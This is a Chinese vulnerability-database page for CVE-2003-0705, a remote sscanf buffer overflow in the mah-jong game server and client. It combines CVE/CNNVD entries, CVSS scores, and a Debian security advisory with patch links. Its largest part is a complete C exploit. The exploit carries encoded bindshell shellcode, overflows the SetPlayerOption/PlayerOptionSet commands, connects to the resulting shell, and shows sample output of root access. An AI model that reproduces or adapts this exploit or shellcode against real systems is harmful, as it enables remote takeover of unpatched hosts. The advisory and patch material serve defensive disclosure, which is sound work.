CVE-2003-0705
CVSS7.5
发布时间 :2003-09-17 00:00:00
修订时间 :2008-09-10 15:20:13
NMCOEPS    

[原文]Buffer overflow in mah-jong 1.5.6 and earlier allows remote attackers to execute arbitrary code.


[CNNVD]Mah-Jong Server未明远程缓冲区溢出漏洞(CNNVD-200309-013)

        
        Mah-Jong Server是一款基于网络的游戏服务程序。
        Mah-Jong Server存在未明缓冲区溢出问题,远程攻击者可以利用这个漏洞以mah-jong服务进程权限在系统上执行任意指令。
        目前没有详细漏洞细节提供。
        

- CVSS (基础分值)

CVSS分值: 7.5 [严重(HIGH)]
机密性影响: PARTIAL [很可能造成信息泄露]
完整性影响: PARTIAL [可能会导致系统文件被修改]
可用性影响: PARTIAL [可能会导致性能下降或中断资源访问]
攻击复杂度: LOW [漏洞利用没有访问限制 ]
攻击向量: [--]
身份认证: NONE [漏洞利用无需身份认证]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0705
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0705
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200309-013
(官方数据源) CNNVD

- 其它链接及资源

http://www.debian.org/security/2003/dsa-378
(PATCH)  DEBIAN  DSA-378

- 漏洞信息

Mah-Jong Server未明远程缓冲区溢出漏洞
高危 边界条件错误
2003-09-17 00:00:00 2005-10-20 00:00:00
远程  
        
        Mah-Jong Server是一款基于网络的游戏服务程序。
        Mah-Jong Server存在未明缓冲区溢出问题,远程攻击者可以利用这个漏洞以mah-jong服务进程权限在系统上执行任意指令。
        目前没有详细漏洞细节提供。
        

- 公告与补丁

        厂商补丁:
        Debian
        ------
        
        http://www.debian.org/security/2003/dsa-378

- 漏洞信息 (23115)

Mah-Jong 1.4 Client/Server Remote sscanf() Buffer Overflow Vulnerability (EDBID:23115)
linux remote
2003-09-07 Verified
0 V9
N/A [点击下载]
source: http://www.securityfocus.com/bid/8557/info

A remote buffer overflow vulnerability when calling the sscanf() function has been reported to affect the mah-jong game client and server programs. The issue occurs within seperate source files, however the code used by both programs is identical. It should be noted that the bug must be triggered using different options depending on whether the target is a client or server.

This vulnerability can be exploited to execute arbitrary code with the privileges of the target client or server application. 

/*[ mah-jong[v1.4]: server/client remote buffer overflow exploit. ]*
 *                                                                 *
 * by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo/realhalo)       *
 *                                                                 *
 * compile:                                                        *
 *  cc xmjong.c -o xmjong                                          *
 *                                                                 *
 * syntax:                                                         *
 *  ./xmjong <host|-b> [port] [return address] [offset]            *
 *                                                                 *
 * this program exploits the "SetPlayerOption" command of          *
 * mah-jong's server(mj-server) and the "PlayerOptionSet" command  *
 * of mah-jong's client(mj-player).  while this is an undiscovered *
 * bug, the giant all-purpose patch on debian's package site       *
 * appears to have resolved the issue.  as such, this exploit      *
 * is applied to CAN-2003-0705.                                    *
 *                                                                 *
 * the overflow itself occurs do to an unchecked sscanf() call to  *
 * write to little_buffer[32].  the situation is rather odd do to  *
 * the repetitive nature of dec_pmsg.c/dec_cmsg.c using sscanf()   *
 * to write to little_buffer[32] properly, with limitation         *
 * restrictions, the other 13 times.  the "SetPlayerOption" and    *
 * "PlayerOptionSet" command apparently slipped by.                *
 *                                                                 *
 * the original plan to exploit this bug was by placing the        *
 * shellcode after the overflow itself, in the same                *
 * little_buffer[32](shellcode on the stack) location.  however,   *
 * there happens to not be very much on the stack, so you start    *
 * running into environmental variables quickly.  this is too      *
 * dependent on the environment size, and will often run out of    *
 * bounds on small environments(ie. 0xc0000000 on linux).          *
 *                                                                 *
 * so, instead the shellcode is being placed on the heap in the    *
 * "buffer.1" buffer.  this can be found by running "objdump -x    *
 * mj-?????? | grep buffer.1", where "??????" is "server" or       *
 * "player", depending on what program is being exploited.  once   *
 * the "buffer.1" address is found add 512 to it, this is to skip  *
 * the initial (re-used) junk at the beginning of the buffer.      *
 *                                                                 *
 * bug location:                                                   *
 *  (server-side; dec_pmsg.c)                                      *
 *   316:if ( strcmp(type,"SetPlayerOption") == 0 ) {              *
 *   ...                                                           *
 *   324:if ( sscanf(s,"%s %n",little_string,&n) ==0 ) { warn("pr$ *
 *  (client-side; dec_cmsg.c)                                      *
 *   876:if ( strcmp(type,"PlayerOptionSet") == 0 ) {              *
 *   ...                                                           *
 *   884:if ( sscanf(s,"%s %n",little_string,&n) ==0 ) { warn("pr$ *
 *                                                                 *
 * fix:                                                            *
 *  1.4-2 patch, which can be found on debian's package site.      *
 *                                                                 *
 * exploit workings(commands sent to the server):                  *
 *  (server-side)                                                  *
 *   Connect 1034 0 <shellcode, under 1024 bytes>                  *
 *   SetPlayerOption <pointer overwrite, >32 byte overflow>        *
 *  (client-side)                                                  *
 *   <shellcode, under 1024 bytes>                                 *
 *   PlayerOptionSet <pointer overwrite, >32 byte overflow>        *
 *                                                                 *
 * example usages:                                                 *
 *  (server-side example usage)                                    *
 *   # cc xmjong.c -o xmjong                                       *
 *   # ./xmjong localhost 5000 `objdump -x mj-server|\             *
 *   > grep buffer.1|awk '{print $1}'` 512                         *
 *   [*] mah-jong[v1.4]: server/client remote buffer overflow exp$ *
 *   [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)          *
 *                                                                 *
 *   [*] target: localhost:5000, return address(buffer.1+512): 0x$ *
 *                                                                 *
 *   [*] attempting to connect: localhost:5000.                    *
 *   [*] successfully connected: localhost:5000.                   *
 *   [*] sending the strings to exploit the overflow.              *
 *   -> Connect 1034 0 ??????????????????????????????????????????$ *
 *   -> SetPlayerOption ?????????????????????????????????????????$ *
 *   [*] checking to see if the exploit was successful.            *
 *   [*] attempting to connect: localhost:45295.                   *
 *   [*] successfully connected: localhost:45295.                  *
 *                                                                 *
 *   Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 ED$ *
 *   uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sy$ *
 *                                                                 *
 *  (client-side example usage)                                    *
 *   # cc xmjong.c -o xmjong                                       *
 *   # ./xmjong -b 5000 `objdump -x mj-player|grep buffer.1|\      *
 *   > awk '{print $1}'` 512                                       *
 *   [*] mah-jong[v1.4]: server/client remote buffer overflow exp$ *
 *   [*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)          *
 *                                                                 *
 *   [*] target: *:5000, return address(buffer.1+512): 0x080733a0. *
 *                                                                 *
 *   [*] awaiting connection from: *:5000.                         *
 *   [*] mah-jong server connection established.                   *
 *   [*] sending the strings to exploit the overflow.              *
 *   -> ?????????????????????????????????????????????????????????$ *
 *   -> PlayerOptionSet ?3???3???3???3???3???3???3???3???3???3???$ *
 *   [*] mah-jong server connection closed.                        *
 *   [*] checking to see if the exploit was successful.            *
 *   [*] attempting to connect: 127.0.0.1:45295.                   *
 *   [*] successfully connected: 127.0.0.1:45295.                  *
 *                                                                 *
 *   Linux localhost.localdomain 2.4.2-2 #1 Sun Apr 8 20:41:30 ED$ *
 *   uid=0(root) gid=0(root) groups=0(root),1(bin),2(daemon),3(sy$ *
 *                                                                 *
 * note:                                                           *
 *  this isn't a completely standard stack overflow; however       *
 *  exploitation looks very similar.  as such, standard stack      *
 *  overflow knowledge is all that is needed to understand this.   *
 *                                                                 *
 * (tested on redhat/7.1, squished exploit code as always, also a  *
 * little loose on the comments this time around)      .,,.        *
 ************************* ..,,,.. .  .    ..    . .. (v9fh) ..... */
#include <stdio.h>      /* ;~~     .,;:iil8OO8li:;,,.  `~~'     ~: */
#include <stdlib.h>     /* :    .i48$$$$$$88O88$$$$$88L.      .  . */
#include <stdarg.h>     /* .   (8$$$P"^`...,.``~;88$$$$8)    :$:   */
#include <string.h>     /*    . `l$$bo.``'       `18$$87 .    `  . */
#include <strings.h>    /* .   .  `t$$8Oo4Oo.   i.. ``., i   ..;.  */
#include <signal.h>     /* .    )  ,$87~8O7~ .  lii: .:: l     '   */
#include <unistd.h>     /* i  .'  .487'__-     4$l;  :ii I _---~   */
#include <ctype.h>      /* l `  .o$87 ..ake  .4$$7., ill I ..alo . */
#include <netdb.h>      /* I .oO$87'..     .4$$$7':illII $       . */
#include <sys/socket.h> /* $.`q87' `` .,o4$$$$87   . lI$ $   .     */
#include <sys/types.h>  /* $Oo.~'      `~t88P~`    i I$$ $       . */
#include <sys/time.h>   /* `~'     _   _           l $$$ $.... ..: */
#include <netinet/in.h> /* !filler FakeHalo ascii! ~ ``' ~~~~~~~~~ */
#include <arpa/inet.h>  /*******************************************/
#define DFLADDR (0x0807f7a0+512) /* objdump -x mj-?????? | grep buffer.1 */
#define DFLPORT 5000 /* default port mah-jong server runs on.            */
#define DFLCLMN 80 /* default column value, if no $COLUMNS is defined.   */
#define TIMEOUT 10 /* generic alarm() timeout, simple style.             */
static char x86_exec[]= /* bindshell(45295)&, netric/S-poly.             */
 "\x57\x5f\xeb\x11\x5e\x31\xc9\xb1\xc8\x80\x44\x0e\xff\x2b\x49\x41\x49\x75"
 "\xf6\xeb\x05\xe8\xea\xff\xff\xff\x06\x95\x06\xb0\x06\x9e\x26\x86\xdb\x26"
 "\x86\xd6\x26\x86\xd7\x26\x5e\xb6\x88\xd6\x85\x3b\xa2\x55\x5e\x96\x06\x95"
 "\x06\xb0\x25\x25\x25\x3b\x3d\x85\xc4\x88\xd7\x3b\x28\x5e\xb7\x88\xe5\x28"
 "\x88\xd7\x27\x26\x5e\x9f\x5e\xb6\x85\x3b\xa2\x55\x06\xb0\x0e\x98\x49\xda"
 "\x06\x95\x15\xa2\x55\x06\x95\x25\x27\x5e\xb6\x88\xd9\x85\x3b\xa2\x55\x5e"
 "\xac\x06\x95\x06\xb0\x06\x9e\x88\xe6\x86\xd6\x85\x05\xa2\x55\x06\x95\x06"
 "\xb0\x25\x25\x2c\x5e\xb6\x88\xda\x85\x3b\xa2\x55\x5e\x9b\x06\x95\x06\xb0"
 "\x85\xd7\xa2\x55\x0e\x98\x4a\x15\x06\x95\x5e\xd0\x85\xdb\xa2\x55\x06\x95"
 "\x06\x9e\x5e\xc8\x85\x14\xa2\x55\x06\x95\x16\x85\x14\xa2\x55\x06\x95\x16"
 "\x85\x14\xa2\x55\x06\x95\x25\x3d\x04\x04\x48\x3d\x3d\x04\x37\x3e\x43\x5e"
 "\xb8\x60\x29\xf9\xdd\x25\x28\x5e\xb6\x85\xe0\xa2\x55\x06\x95\x15\xa2\x55"
 "\x06\x95\x5e\xc8\x85\xdb\xa2\x55\xc0\x6e";
char *getptr(unsigned int);
char *getcode(void);
char *mj_bind(unsigned short,unsigned int);
unsigned short mj_connect(char *,unsigned short,unsigned int);
void getshell(char *,unsigned short);
void filter_text(char *);
void mj_printf(int,char *,...);
void printe(char *,short);
void sig_alarm(){printe("alarm/timeout hit.",1);}
int main(int argc,char **argv){
 unsigned short isbind=0,port=DFLPORT;
 unsigned int ptr=DFLADDR;
 char *hostptr;
 printf("[*] mah-jong[v1.4]: server/client remote buffer overflow ex"
 "ploit.\n[*] by: vade79/v9 v9@fakehalo.deadpig.org (fakehalo)\n\n"); 
 if(argc<2){
  printf("[!] syntax: %s <host|-b> [port] [return address] [offset]\n",
  argv[0]);
  exit(1);
 }
 if(!strcmp(argv[1],"-b"))isbind=1;
 if(argc>2)port=atoi(argv[2]);
 if(argc>3)sscanf(argv[3],"%x",&ptr);
 if(argc>4)ptr+=atoi(argv[4]);
 printf("[*] target: %s:%u, return address(buffer.1+512): 0x%.8x.\n\n",
 isbind?"*":argv[1],port,ptr);
 if(isbind)hostptr=mj_bind(port,ptr);
 else mj_connect((hostptr=argv[1]),port,ptr);
 sleep(1);
 getshell(hostptr,45295); /* defined in shellcode. */
 exit(0);
}
char *getptr(unsigned int newptr){
 unsigned int i=0;
 char *buf;
 if(!(buf=(char *)malloc(128+1)))
  printe("getptr(): allocating memory failed.",1);
 memset(buf,0x0,128+1);
 for(i=0;i<128;i+=4){*(long *)&buf[i]=newptr;}
 return(buf);
}
char *getcode(void){
 char *buf;
 if(!(buf=(char *)malloc(1000+1)))
  printe("getcode(): allocating memory failed",1);
 memset(buf,0x90,(1000-strlen(x86_exec)));
 memcpy(buf+(1000-strlen(x86_exec)),x86_exec,strlen(x86_exec));
 return(buf);
}
char *mj_bind(unsigned short port,unsigned int newptr){
 int ssock=0,sock=0,so=1;
 unsigned int salen=0;
 struct sockaddr_in ssa,sa;
 ssock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 setsockopt(ssock,SOL_SOCKET,SO_REUSEADDR,(void *)&so,sizeof(so));
#ifdef SO_REUSEPORT
 setsockopt(ssock,SOL_SOCKET,SO_REUSEPORT,(void *)&so,sizeof(so));
#endif
 ssa.sin_family=AF_INET;
 ssa.sin_port=htons(port);
 ssa.sin_addr.s_addr=INADDR_ANY;
 printf("[*] awaiting connection from: *:%d.\n",port);
 if(bind(ssock,(struct sockaddr *)&ssa,sizeof(ssa))==-1)
  printe("could not bind socket.",1);
 listen(ssock,1);
 bzero((char*)&sa,sizeof(struct sockaddr_in));
 salen=sizeof(sa);
 sock=accept(ssock,(struct sockaddr *)&sa,&salen);
 close(ssock);
 printf("[*] mah-jong server connection established.\n");
 printf("[*] sending the strings to exploit the overflow.\n");
 mj_printf(sock,"%s\n",getcode());
 mj_printf(sock,"PlayerOptionSet %s\n",getptr(newptr));
 sleep(1);
 close(sock);
 printf("[*] mah-jong server connection closed.\n");
 return(inet_ntoa(sa.sin_addr));
}
unsigned short mj_connect(char *hostname,unsigned short port,
unsigned int newptr){
 int sock;
 struct hostent *t;
 struct sockaddr_in s;
 sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP);
 s.sin_family=AF_INET;
 s.sin_port=htons(port);
 printf("[*] attempting to connect: %s:%d.\n",hostname,port);
 if((s.sin_addr.s_addr=inet_addr(hostname))){
  if(!(t=gethostbyname(hostname)))
   printe("couldn't resolve hostname.",1);
  memcpy((char*)&s.sin_addr,(char*)t->h_addr,sizeof(s.sin_addr));
 }
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 if(connect(sock,(struct sockaddr *)&s,sizeof(s)))
  printe("mah-jong connection failed.",1);
 alarm(0);
 printf("[*] successfully connected: %s:%d.\n",hostname,port);
 printf("[*] sending the strings to exploit the overflow.\n");
 mj_printf(sock,"Connect 1034 0 %s\n",getcode());
 mj_printf(sock,"SetPlayerOption %s\n",getptr(newptr));
 sleep(1);
 close(sock);
 return(0);
}
void getshell(char *hostname,unsigned short port){
 int sock,r;
 fd_set fds;
 char buf[4096+1];
 struct hostent *he;
 struct sockaddr_in sa;
 printf("[*] checking to see if the exploit was successful.\n");
 if((sock=socket(AF_INET,SOCK_STREAM,IPPROTO_TCP))==-1)
  printe("getshell(): socket() failed.",1);
 sa.sin_family=AF_INET;
 if((sa.sin_addr.s_addr=inet_addr(hostname))){
  if(!(he=gethostbyname(hostname)))
   printe("getshell(): couldn't resolve.",1);
  memcpy((char *)&sa.sin_addr,(char *)he->h_addr,
  sizeof(sa.sin_addr));
 }
 sa.sin_port=htons(port);
 signal(SIGALRM,sig_alarm);
 alarm(TIMEOUT);
 printf("[*] attempting to connect: %s:%d.\n",hostname,port);
 if(connect(sock,(struct sockaddr *)&sa,sizeof(sa))){
  printf("[!] connection failed: %s:%d.\n",hostname,port);
  return;
 }
 alarm(0);
 printf("[*] successfully connected: %s:%d.\n\n",hostname,port);
 signal(SIGINT,SIG_IGN);
 write(sock,"uname -a;id\n",13);
 while(1){
  FD_ZERO(&fds);
  FD_SET(0,&fds);
  FD_SET(sock,&fds);
  if(select(sock+1,&fds,0,0,0)<1)
   printe("getshell(): select() failed.",1);
  if(FD_ISSET(0,&fds)){
   if((r=read(0,buf,4096))<1)
    printe("getshell(): read() failed.",1);
   if(write(sock,buf,r)!=r)
    printe("getshell(): write() failed.",1);
  }
  if(FD_ISSET(sock,&fds)){
   if((r=read(sock,buf,4096))<1)exit(0);
   write(1,buf,r);
  }
 }
 close(sock);
 return;
}
void filter_text(char *ptr){
 unsigned int i=0,columns=DFLCLMN;
 if(getenv("COLUMNS"))columns=atoi(getenv("COLUMNS"));
 if(7>columns||columns>256)columns=DFLCLMN;
 for(i=0;i<strlen(ptr);i++){
  if(i>=(columns-3)){
   ptr[i--]=0x0;
   ptr[i--]='.';
   ptr[i--]='.';
   ptr[i]='.';
  }
  else if(ptr[i]=='\r'||ptr[i]=='\n')ptr[i]=0x0;
  else if(!isprint(ptr[i]))ptr[i]='?';
 }
 return;
}
void mj_printf(int sock,char *fmt,...){
 char *buf;
 va_list ap;
 if(!(buf=(char *)malloc(1024+1)))
  printe("mj_printf(): allocating memory failed.",1);
 memset(buf,0x0,1024+1);
 va_start(ap,fmt);
 vsnprintf(buf,1024,fmt,ap);
 va_end(ap);
 write(sock,buf,strlen(buf));
 filter_text(buf);
 printf("-> %s\n",buf);
 free(buf);
 return;
}
void printe(char *err,short e){
 printf("[!] %s\n",err);
 if(e)exit(1);
 return;
}
		

- 漏洞信息 (F31607)

DSA-378-1 (PacketStormID:F31607)
2003-09-10 00:00:00
Matt Zimmerman,Nicolas Boullis  debian.org
advisory,remote,denial of service,vulnerability
linux,debian
CVE-2003-0705,CVE-2003-0706
[点击下载]

Debian Security Advisory DSA 378-1 - Two vulnerabilities have been found in the Mah-Jong server version 1.4 and below. One enables a remote attacker to gain privileges of the user running the server while the other leads to a denial of service.

-----BEGIN PGP SIGNED MESSAGE-----
Hash: SHA1

- --------------------------------------------------------------------------
Debian Security Advisory DSA 378-1                     security@debian.org
http://www.debian.org/security/                             Matt Zimmerman
September 7th, 2003                     http://www.debian.org/security/faq
- --------------------------------------------------------------------------

Package        : mah-jong
Vulnerability  : buffer overflows, denial of service
Problem-Type   : remote
Debian-specific: no
CVE Ids        : CAN-2003-0705 CAN-2003-0706

Nicolas Boullis discovered two vulnerabilities in mah-jong, a
network-enabled game.

 - CAN-2003-0705 (buffer overflow)

   This vulnerability could be exploited by a remote attacker to
   execute arbitrary code with the privileges of the user running the
   mah-jong server.

- - CAN-2003-0706 (denial of service)

  This vulnerability could be exploited by a remote attacker to cause
  the mah-jong server to enter a tight loop and stop responding to
  commands.

For the stable distribution (woody) these problems have been fixed in
version 1.4-2.

For the unstable distribution (sid) these problems have been fixed in
version 1.5.6-2.

We recommend that you update your mah-jong package.

Upgrade Instructions
- --------------------

wget url
        will fetch the file for you
dpkg -i file.deb
        will install the referenced file.

If you are using the apt-get package manager, use the line for
sources.list as given below:

apt-get update
        will update the internal database
apt-get upgrade
        will install corrected packages

You may use an automated update by adding the resources from the
footer to the proper configuration.

Debian GNU/Linux 3.0 alias woody
- --------------------------------

  Source archives:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2.dsc
      Size/MD5 checksum:      579 b473dfb32c1765f3b96a1d4897a728a5
    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2.diff.gz
      Size/MD5 checksum:    23814 c0465cd149b6f9bfc7f0096ab5d0d192
    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4.orig.tar.gz
      Size/MD5 checksum:   259474 21cc99ddb9ae91cbe02b2119586f8860

  Alpha architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_alpha.deb
      Size/MD5 checksum:   311378 0ff83a703283cad7faa06609d330d9ef

  ARM architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_arm.deb
      Size/MD5 checksum:   272324 e6974d354918f6f4d0dffa3bb3eb4b9f

  Intel IA-32 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_i386.deb
      Size/MD5 checksum:   250012 a4f7d586918c3a712d073aa9e8e42bd5

  Intel IA-64 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_ia64.deb
      Size/MD5 checksum:   379856 b63ee72a1a2f4ac16e902ae0f8b5b3e1

  HP Precision architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_hppa.deb
      Size/MD5 checksum:   286728 c4c544f15f09199b753848cb7ee417d9

  Motorola 680x0 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_m68k.deb
      Size/MD5 checksum:   234410 91682fc41ab6fb8b57ebfb09681f3180

  Big endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_mips.deb
      Size/MD5 checksum:   261874 977e1d059bbaca988a3cb60636e74d17

  Little endian MIPS architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_mipsel.deb
      Size/MD5 checksum:   261666 45e1785dd5c17dcbec971fc8024b8787

  PowerPC architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_powerpc.deb
      Size/MD5 checksum:   271566 5d25f219fdb987ca014775ae4ae9ee9c

  IBM S/390 architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_s390.deb
      Size/MD5 checksum:   246116 be071c93713eb1257f9a8b8225968ad8

  Sun Sparc architecture:

    http://security.debian.org/pool/updates/main/m/mah-jong/mah-jong_1.4-2_sparc.deb
      Size/MD5 checksum:   269392 78b122c5b4145b039dda06d4e16cfe48

  These files will probably be moved into the stable distribution on
  its next revision.

- ---------------------------------------------------------------------------------
For apt-get: deb http://security.debian.org/ stable/updates main
For dpkg-ftp: ftp://security.debian.org/debian-security dists/stable/updates/main
Mailing list: debian-security-announce@lists.debian.org
Package info: `apt-cache show <pkg>' and http://packages.debian.org/<pkg>
-----BEGIN PGP SIGNATURE-----
Version: GnuPG v1.2.3 (GNU/Linux)

iD8DBQE/W7VAArxCt0PiXR4RAlMPAJ9oD49qKrE9OK4LEHnVtA4dCfcM+QCcDPk/
w5fxjmEjVzpNWzgcO/lBpsQ=
=t7CW
-----END PGP SIGNATURE-----
    

- 漏洞信息

6586
mah-jong Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity
Exploit Unknown

- 漏洞描述

A remote overflow exists in mah-jong. With a specially crafted request, an attacker can cause mah-jong to execute arbitrary code with the permissions of the user running mah-jong on the server resulting in a loss of integrity.

- 时间线

2003-09-07 Unknow
Unknow Unknow

- 解决方案

Upgrade to version 1.4-2, 1.5.6-2, or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- 相关参考

- 漏洞作者

- 漏洞信息

Mah-Jong Client/Server Remote sscanf() Buffer Overflow Vulnerability
Boundary Condition Error 8557
Yes No
2003-09-07 12:00:00 2009-07-11 11:56:00
Discovery of this vulnerability has been credited to Nicolas Boullis.

- 受影响的程序版本

Nicolas Boullis Mah-Jong 1.4
+ Debian Linux 3.0 sparc
+ Debian Linux 3.0 s/390
+ Debian Linux 3.0 ppc
+ Debian Linux 3.0 mipsel
+ Debian Linux 3.0 mips
+ Debian Linux 3.0 m68k
+ Debian Linux 3.0 ia-64
+ Debian Linux 3.0 ia-32
+ Debian Linux 3.0 hppa
+ Debian Linux 3.0 arm
+ Debian Linux 3.0 alpha

- 漏洞讨论

A remote buffer overflow vulnerability when calling the sscanf() function has been reported to affect the mah-jong game client and server programs. The issue occurs within seperate source files, however the code used by both programs is identical. It should be noted that the bug must be triggered using different options depending on whether the target is a client or server.

This vulnerability can be exploited to execute arbitrary code with the privileges of the target client or server application.

- 漏洞利用

An exploit has been developed and released by vade79 and is available below.

- 解决方案

Debian have released an advisory (DSA 378-1), which contains fixes to address this issue. Affected users are advised to upgrade as soon as possible. Further details regarding applying fixes are available in the referenced advisory.

- 相关参考

     

     

    关于SCAP中文社区

    SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

    版权声明

    CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站